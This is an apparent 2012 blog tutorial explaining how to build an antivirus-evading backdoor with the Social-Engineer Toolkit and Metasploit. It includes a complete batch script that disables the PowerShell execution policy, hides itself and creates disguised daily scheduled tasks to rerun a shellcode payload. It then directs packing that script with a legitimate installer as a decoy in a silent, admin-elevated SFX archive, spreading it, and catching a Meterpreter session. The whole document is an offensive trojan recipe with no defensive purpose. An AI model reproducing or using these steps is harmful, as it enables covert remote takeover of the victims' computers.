noviembre 27, 2012
10:21

How To Get A Fully Undetectable Backdoor/Payload With Set And Metasploit

Open S.E.T and select the first option



Then Select the powershell option 10



And then the first option alphanumeric shellcode injector



Add the IP address



And the port



Don't start the listener now



Go to the given path





Second Step: Create the backdoor

Edit the two files and add "@echo off" on the top of each one.

Rename each one ps86.bat and ps64.bat and copy them on a windows machine with winrar installed.

Create another bat file named setup.bat with this code inside :


@echo off
powershell Set-ExecutionPolicy Unrestricted
cd %userprofile%
attrib +H setup.bat
schtasks /create /F /SC DAILY /TN "System" /TR "%userprofile%\ps86.bat" /ST 10:00
schtasks /create /F /SC DAILY /TN "System1" /TR "%userprofile%\ps64.bat" /ST 10:00
start ps86.bat
start ps64.bat
start old.exe
Get a legit executable setup file, rename it at old.exe and add the 3 bat file on an archive.



Select create an SFX archive and click on advanced tab and Click on SFX Options

Path to extract : %userprofile%
Select setup tab and type setup.bat at run after extraction
Select mode tab and select Hide all
Select advanced tab and select request administrative access



Select Update tab and on overwrite mode select overwrite all file
Select Text and Icon and add an icon



Click ok twice and wait for the archive creation

Third Step: Spread and Get a Meterpreter

Open a listener on Armitage





Wait for the payload execution



Get Your Meterpreter